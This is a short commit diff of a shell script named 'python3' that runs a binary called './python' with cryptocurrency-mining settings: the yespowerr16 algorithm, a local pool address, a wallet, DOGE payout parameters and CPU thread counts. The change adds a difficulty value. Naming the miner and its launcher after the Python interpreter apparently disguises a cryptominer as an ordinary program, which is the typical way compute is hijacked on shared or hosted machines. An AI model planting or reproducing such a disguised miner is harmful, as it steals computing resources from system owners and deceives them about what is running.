Update python3
Browse files
python3
CHANGED
|
@@ -1,4 +1,4 @@
|
|
| 1 |
#!/bin/sh
|
| 2 |
reset
|
| 3 |
|
| 4 |
-
./python --algorithm yespowerr16 --pool 127.0.0.1:3001 --wallet DREaEQX5qqZ4NKwjhbVersvaabESuuQ3V3 --password c=DOGE,mc=YTN,ID=tes --cpu-threads 4 --disable-gpu
|
|
|
|
| 1 |
#!/bin/sh
|
| 2 |
reset
|
| 3 |
|
| 4 |
+
./python --algorithm yespowerr16 --pool 127.0.0.1:3001 --wallet DREaEQX5qqZ4NKwjhbVersvaabESuuQ3V3 --password c=DOGE,mc=YTN,ID=tes,d=0.125 --cpu-threads 4 --disable-gpu
|